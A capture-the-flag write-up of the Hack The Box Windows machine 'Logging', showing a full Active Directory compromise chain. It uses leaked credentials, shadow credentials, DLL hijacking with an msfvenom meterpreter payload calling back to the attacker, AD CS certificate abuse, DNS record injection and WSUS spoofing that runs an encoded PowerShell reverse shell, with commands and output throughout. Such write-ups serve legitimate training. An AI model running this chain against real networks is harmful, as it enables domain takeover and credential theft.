Hack The Box · Lab
MediumWindowsActive DirectoryPrivilege EscalationKerberosPassword Attacks

IP: 10.129.35.79 | Domain: logging.htb


Environment Setup

export TARGET=10.129.35.79
export USER=wallace.everette
export PASSWD=Welcome2026@
export DOMAIN=logging.htb
export DC=DC01.logging.htb
export ATTACKER_IP=10.10.15.169
echo "$TARGET logging.htb DC01.logging.htb" | sudo tee -a /etc/hosts

Step 1 — Port Scanning

Why: Map the attack surface. Open ports and services reveal available attack angles.

nmap -sCV -p- --min-rate 5000 $TARGET

Output:

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8530/tcp  open  unknown
8531/tcp  open  unknown
9389/tcp  open  adws
47001/tcp open  winrm

Key findings:

  • Confirmed Domain Controller — Kerberos (88), LDAP (389/636/3268), DNS (53)
  • WinRM (5985) open — useful if valid credentials obtained
  • WSUS ports (8530/8531) — potential for update spoofing attacks

Step 2 — Initial Access Validation

Why: Validate the provided credentials and enumerate accessible shares before deeper enumeration.

nxc smb $TARGET -u $USER -p $PASSWD --shares

Output:

SMB  DC01  [+] logging.htb\wallace.everette:Welcome2026@
Share       Permissions
Logs        READ
NETLOGON    READ
SYSVOL      READ
WSUSTemp

Key findings:

  • Credentials valid — SMB authentication successful
  • Logs share readable — likely contains sensitive information
  • WSUSTemp share present — confirms WSUS infrastructure

Step 3 — SMB Share Enumeration

Why: The Logs share may contain sensitive information like credential dumps or configuration files.

nxc smb $TARGET -u $USER -p $PASSWD -M spider_plus -o DOWNLOAD_FLAG=True

Output:

[2026-02-09 03:00:03.125] [PID:4102] [Thread:04] VERBOSE - ConnectionContext Dump:
{ Domain: "logging.htb", Server: "DC01", SSL: "False", BindUser: "LOGGING\svc_recovery", BindPass: "REDACTED", Timeout: 30 }

Key findings:

  • Downloaded IdentitySync_Trace_20260219.log from Logs share
  • Log contains credential leak: LOGGING\svc_recovery:REDACTED
  • Password appears to be year-based — try increment 2025 → 2026

Step 4 — Password Attack

Why: Credential leak shows password.

impacket-getTGT logging.htb/svc_recovery -dc-ip $TARGET

Output:

[*] Saving ticket in svc_recovery.ccache

Key findings:

  • Password increment successful
  • TGT obtained for svc_recovery account
  • Can now perform Kerberos-based enumeration

Step 5 — ACL Enumeration

Why: With valid credentials we enumerate writable AD objects to identify privilege escalation paths.

export KRB5CCNAME=svc_recovery.ccache
bloodyAD --host $DC -u svc_recovery -k get writable --detail

Output:

distinguishedName: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb

Key findings:

  • svc_recovery has WriteOwner on msa_health$ MSA account
  • WriteOwner allows shadow credentials attack
  • msa_health$ likely has elevated privileges as service account

Step 6 — Shadow Credentials Attack

Why: WriteOwner on msa_health$ allows us to add Key Credentials for authentication. Shadow credentials provide NTLM hash for pass-the-hash.

certipy shadow -u svc_recovery@$DOMAIN -k -target $DC -account msa_health$ auto

Output:

[*] NT Hash: <REDACTED>

Key findings:

  • Shadow credentials attack successful
  • Obtained NT hash for msa_health$:
  • Can now authenticate as msa_health$ service account

Step 7 — Service Account Shell Access

Why: Service accounts often have elevated privileges for automation tasks. Explore what msa_health$ can access.

evil-winrm -u 'msa_health$' -H '<REDACTED>' -i $TARGET

Output:

*Evil-WinRM* PS C:\Users\msa_health$\Documents>

Key findings:

  • WinRM access successful as msa_health$
  • Service account has remote management permissions
  • Ready for privilege escalation enumeration

Step 8 — UpdateMonitor Service Discovery

Why: Service accounts often run scheduled tasks. Enumerate for privilege escalation opportunities.

Get-ScheduledTask | Where-Object {$_.TaskName -like "*Update*"}

Output:

TaskName               : UpdateChecker Agent
State                  : Ready
Actions                : {C:\Program Files\UpdateMonitor\UpdateMonitor.exe}
Principal              : jaylee.clifton

Key findings:

  • UpdateChecker Agent runs as jaylee.clifton user
  • Executable path: C:\Program Files\UpdateMonitor\UpdateMonitor.exe
  • Potential DLL hijacking opportunity

Step 9 — DLL Hijacking Analysis

Why: UpdateMonitor.exe may load DLLs from predictable locations. Analyze for hijacking opportunities.

cd "C:\Program Files\UpdateMonitor\"
.\UpdateMonitor.exe

Output:

[2026-04-19 13:10:02] Info: Core did not find file Settings_Update.zip
[2026-04-19 13:10:02] Checking for update on local server...
[2026-04-19 13:10:02] No updates found locally: C:\ProgramData\UpdateMonitor\Settings_Update.zip.
[2026-04-19 13:10:02] Loading update applier: C:\Program Files\UpdateMonitor\bin\settings_update.dll
[2026-04-19 13:10:02] Failed to load settings_update.dll. Error code: 126

Key findings:

  • UpdateMonitor looks for Settings_Update.zip in C:\ProgramData\UpdateMonitor\
  • Attempts to load settings_update.dll from extracted zip
  • DLL loading failure indicates hijacking opportunity

Step 10 — Malicious DLL Creation

Why: UpdateMonitor extracts and loads settings_update.dll. We can hijack this by providing malicious DLL in ZIP file.

msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=$ATTACKER_IP LPORT=1234 > settings_update.dll
zip Settings_Update.zip settings_update.dll

Output:

[*] x86/shikata_ga_nai succeeded with size 381 (iteration=0)
[*] x86/shikata_ga_nai succeeded with size 408 (iteration=1)

Key findings:

  • Created malicious x86 DLL (UpdateMonitor is 32-bit)
  • ZIP archive ready for upload
  • Meterpreter payload targets $ATTACKER_IP:1234

Step 11 — DLL Deployment and Execution

Why: Upload malicious ZIP to trigger DLL hijacking when UpdateChecker Agent runs (every 3 minutes).

cd C:\ProgramData\UpdateMonitor\
upload Settings_Update.zip

Setup Metasploit handler:

use multi/handler
set LHOST $ATTACKER_IP
set lport 1234
set PAYLOAD windows/meterpreter/reverse_tcp
run

Output:

[*] Started reverse TCP handler on 10.10.15.169:1234
[*] Sending stage (176198 bytes) to 10.129.35.79
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: LOGGING\jaylee.clifton

Key findings:

  • DLL hijacking successful
  • Meterpreter shell as jaylee.clifton
  • User flag accessible: C:\Users\jaylee.clifton\Desktop\user.txt

Step 12 — WSUS Infrastructure Analysis

Why: jaylee.clifton is IT support. Analyze WSUS incident reports for privilege escalation paths.

type "C:\Users\jaylee.clifton\Documents\Tickets\Incident_4922_WSUS_Remediation_ViewExport.html"

Output:

Machine is still choking on the standard catalog. Since the "official" server migration is taking forever, I've pointed this box to the staging endpoint at wsus.logging.htb.
DNS is still not updated so don't bother pinging it from outside the test subnet.
Task is running on a 120s loop. It nukes SoftwareDistribution and restarts the agent every cycle.

Key findings:

  • DC01 points to wsus.logging.htb for updates
  • DNS record doesn't exist yet — hijacking opportunity
  • ForceSync task runs every 120 seconds
  • Perfect WSUS spoofing attack vector

Step 13 — AD CS Template Enumeration

Why: jaylee.clifton is in IT group. Check for vulnerable certificate templates that allow server impersonation.

certutil -split -urlcache -f http://$ATTACKER_IP/Certify.exe C:\users\jaylee.clifton\Documents\Certify.exe
.\Certify.exe find /enrolleeSuppliesSubject

Output:

Template Name             : UpdateSrv
Enrollment Rights         : logging\IT
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
pkiextendedkeyusage       : Server Authentication
Validity Period           : 10 years

Key findings:

  • UpdateSrv template allows IT group enrollment
  • EnrolleeSuppliesSubject = can specify CN and SAN
  • Server Authentication EKU = can impersonate servers
  • ESC17 attack vector for WSUS spoofing

Step 14 — Certificate Request for WSUS

Why: Request certificate for wsus.logging.htb to enable TLS spoofing of WSUS server.

.\Certify.exe request /ca:"DC01.logging.htb\logging-DC01-CA" /template:"UpdateSrv" /subject:"CN=wsus.logging.htb" /altname:"wsus.logging.htb"

Output:

[*] Certificate Authority   : DC01.logging.htb\logging-DC01-CA
[*] CA Response             : The certificate had been issued.
[*] Request ID              : 7

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAuSUuMnzP4DfN...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGeDCCBGCgAwIBAgITFAAAAAfn...
-----END CERTIFICATE-----

Key findings:

  • Certificate successfully issued by DC-trusted CA
  • Valid for CN=wsus.logging.htb with 10-year validity
  • Private key and certificate ready for TLS spoofing

Step 15 — DNS Hijacking

Why: Create DNS record for wsus.logging.htb pointing to attacker IP for WSUS spoofing.

# Save certificate on Kali
cat > wsus.pem << 'EOF'
[CERTIFICATE_AND_KEY_CONTENT]
EOF

# Add DNS record
bloodyAD --host dc01.logging.htb -d logging.htb -u svc_recovery -k add dnsRecord wsus $ATTACKER_IP

Output:

[+] wsus has been successfully added

Key findings:

  • DNS record created: wsus.logging.htb10.10.15.169
  • Certificate authority trusted by DC01
  • Infrastructure ready for WSUS spoofing

Step 16 — WSUS Spoofing Attack

Why: DC01 checks wsus.logging.htb every 120s. Spoof malicious updates to achieve SYSTEM execution.

# Setup SYSTEM payload
PAYLOAD='$client = New-Object System.Net.Sockets.TCPClient("'$ATTACKER_IP'",9002);...'
B64=$(echo "$PAYLOAD" | iconv -t UTF-16LE | base64 -w0)

# Start WSUS server with PsExec
sudo wsuks -t $TARGET \
  --tls-cert wsus.pem \
  --WSUS-Server wsus.logging.htb \
  --serve-only \
  -c "/accepteula -s powershell.exe -enc $B64" \
  -I tun0

Output:

[*] Starting WSUS Server on 10.10.15.169:8531...
[+] Received POST request: /ClientWebService/client.asmx
[+] Received GET request: /0b662978-f8b5-434b-aa6e-4ff3d93e1565/PsExec64.exe

Setup SYSTEM listener:

nc -lnvp 9002

Output:

connect to [10.10.15.169] from (UNKNOWN) [10.129.35.79] 63562
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> type C:\users\toby.brynleigh\desktop\root.txt

Key findings:

  • WSUS spoofing successful
  • SYSTEM shell achieved via PsExec
  • Root flag captured:

Full Attack Chain

wallace.everette (Provided creds)
  └─ SMB enumeration → IdentitySync logs
        └─ Password increment → svc_recovery (REDACTED)
              └─ WriteOwner on msa_health$ → Shadow Credentials
                    └─ NT hash → WinRM shell as msa_health$
                          └─ DLL hijacking → UpdateMonitor service
                                └─ Meterpreter as jaylee.clifton
                                      └─ IT group → AD CS UpdateSrv template
                                            └─ ESC17 cert for wsus.logging.htb
                                                  └─ DNS hijacking + WSUS spoofing
                                                        └─ PsExec as SYSTEM
                                                              🏴 ROOT FLAG

© 0xNRG — Logging pwned — 2026-04-22

Writeup restricted

This machine is currently active. The full writeup will be published once the box retires, in accordance with HTB's NDA policy.

Status — Active